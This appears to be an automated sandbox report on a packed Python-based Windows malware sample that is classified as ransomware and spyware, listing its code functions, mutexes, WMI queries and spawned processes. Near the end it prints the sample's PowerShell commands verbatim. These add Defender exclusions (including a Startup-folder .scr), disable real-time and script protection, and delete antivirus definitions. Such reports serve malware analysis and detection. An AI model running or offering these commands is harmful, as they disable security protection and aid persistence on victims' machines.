              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1EAF9070_2_00007FF6AA1EAF90
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1EDFD870_2_00007FF6AA1EDFD8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C4FE870_2_00007FF6AA1C4FE8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19303070_2_00007FF6AA193030
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BC00C70_2_00007FF6AA1BC00C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AC05C70_2_00007FF6AA1AC05C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B007470_2_00007FF6AA1B0074
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B804070_2_00007FF6AA1B8040
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E00F070_2_00007FF6AA1E00F0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A010470_2_00007FF6AA1A0104
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C9D7470_2_00007FF6AA1C9D74
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D1DCC70_2_00007FF6AA1D1DCC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA191E0470_2_00007FF6AA191E04
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18EE0870_2_00007FF6AA18EE08
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1DFE7470_2_00007FF6AA1DFE74
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA198E6870_2_00007FF6AA198E68
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CAE5070_2_00007FF6AA1CAE50
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CEEA470_2_00007FF6AA1CEEA4
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18CE8470_2_00007FF6AA18CE84
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA189EFC70_2_00007FF6AA189EFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BAF0C70_2_00007FF6AA1BAF0C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19236070_2_00007FF6AA192360
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B037470_2_00007FF6AA1B0374
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AC3E070_2_00007FF6AA1AC3E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AD45870_2_00007FF6AA1AD458
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C546870_2_00007FF6AA1C5468
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18A50470_2_00007FF6AA18A504
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C216470_2_00007FF6AA1C2164
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C81CC70_2_00007FF6AA1C81CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E41CC70_2_00007FF6AA1E41CC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19E21C70_2_00007FF6AA19E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D226870_2_00007FF6AA1D2268
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A724470_2_00007FF6AA1A7244
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18F24C70_2_00007FF6AA18F24C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C02A470_2_00007FF6AA1C02A4
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1842E070_2_00007FF6AA1842E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19D2C070_2_00007FF6AA19D2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D832C70_2_00007FF6AA1D832C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D131470_2_00007FF6AA1D1314
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A67E070_2_00007FF6AA1A67E0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1917C870_2_00007FF6AA1917C8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D18A870_2_00007FF6AA1D18A8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA18888470_2_00007FF6AA188884
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19289070_2_00007FF6AA192890
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B38E870_2_00007FF6AA1B38E8
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BD91C70_2_00007FF6AA1BD91C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B090470_2_00007FF6AA1B0904
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C190C70_2_00007FF6AA1C190C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19859870_2_00007FF6AA198598
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BF59C70_2_00007FF6AA1BF59C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1AF5B070_2_00007FF6AA1AF5B0
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1B65FC70_2_00007FF6AA1B65FC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D260C70_2_00007FF6AA1D260C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1D766070_2_00007FF6AA1D7660
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1986C470_2_00007FF6AA1986C4
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1E86D470_2_00007FF6AA1E86D4
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C270070_2_00007FF6AA1C2700
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1BA71070_2_00007FF6AA1BA710
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1C071070_2_00007FF6AA1C0710
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: String function: 00007FF6AA1C49F4 appears 53 times
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: String function: 00007FF6AA198444 appears 48 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF8A92E12EE appears 144 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF78DA52710 appears 82 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF8A87E8450 appears 39 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF8A934DF9F appears 44 times
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeCode function: String function: 00007FF8A934E035 appears 34 times
              Source: 9g9LZNE4bH.exeStatic PE information: invalid certificate
              Source: rar.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: 9g9LZNE4bH.exeBinary or memory string: OriginalFilename vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029680452.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2027522576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000000.2024791081.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWerMgrj% vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026438484.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025472541.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029990459.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025338149.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025057853.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026254696.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2029516271.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026342606.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025951320.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2025197321.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026037840.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000000.00000003.2026161576.000001A5F3611000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exeBinary or memory string: OriginalFilename vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2408936986.00007FF8B7E13000.00000004.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2410749763.00007FF8B9F6C000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2410371024.00007FF8B93D8000.00000004.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2409848881.00007FF8B8B4C000.00000004.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2406234372.00007FF8A845B000.00000004.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2408750040.00007FF8A9393000.00000004.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibsslH vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2409129027.00007FF8B7E4D000.00000004.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2408434798.00007FF8A8F2C000.00000004.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000000.2030556743.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWerMgrj% vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2409538341.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2410588457.00007FF8B984C000.00000004.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2407250158.00007FF8A87B4000.00000004.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2411111801.00007FF8BFAC7000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2410144947.00007FF8B8F92000.00000004.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2409346784.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs 9g9LZNE4bH.exe
              Source: 9g9LZNE4bH.exeBinary or memory string: OriginalFilenameWerMgrj% vs 9g9LZNE4bH.exe
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: Commandline size = 3647
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: Commandline size = 3647Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 3615
              Source: libcrypto-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987034574468086
              Source: libssl-1_1.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9922604615660919
              Source: python311.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9991515062597809
              Source: sqlite3.dll.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9975816061482433
              Source: unicodedata.pyd.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.9943188170840788
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@143/56@2/2
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19CAFC GetLastError,FormatMessageW,70_2_00007FF6AA19CAFC
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA19EF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,70_2_00007FF6AA19EF50
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1CB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,70_2_00007FF6AA1CB57C
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeCode function: 70_2_00007FF6AA1A3144 GetDiskFreeSpaceExW,70_2_00007FF6AA1A3144
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7596:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7320:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8168:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7172:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7288:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeMutant created: \Sessions\1\BaseNamedObjects\l
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8120:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5748:120:WilError_03
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI61762Jump to behavior
              Source: 9g9LZNE4bH.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Local\Temp\_MEI61762\rar.exeFile read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: 9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: 9g9LZNE4bH.exeVirustotal: Detection: 45%
              Source: 9g9LZNE4bH.exeReversingLabs: Detection: 42%
              Source: 9g9LZNE4bH.exeString found in binary or memory: set-addPolicy
              Source: 9g9LZNE4bH.exeString found in binary or memory: id-cmc-addExtensions
              Source: 9g9LZNE4bH.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
              Source: 9g9LZNE4bH.exeString found in binary or memory: command-line parameters (see --help for details): PYTHONDEBUG : enable parser debug mode (-d) PYTHONDONTWRITEBYTECODE : don't write .pyc files (-B) PYTHONINSPECT : inspect interactively after running script (-i) PYTHONINTMAXSTRDIGITS :
              Source: 9g9LZNE4bH.exeString found in binary or memory: --help
              Source: 9g9LZNE4bH.exeString found in binary or memory: --help
              Source: 9g9LZNE4bH.exeString found in binary or memory: can't send non-None value to a just-started generator
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeFile read: C:\Users\user\Desktop\9g9LZNE4bH.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\9g9LZNE4bH.exe "C:\Users\user\Desktop\9g9LZNE4bH.exe"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Users\user\Desktop\9g9LZNE4bH.exe "C:\Users\user\Desktop\9g9LZNE4bH.exe"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9g9LZNE4bH.exe'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\9g9LZNE4bH.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
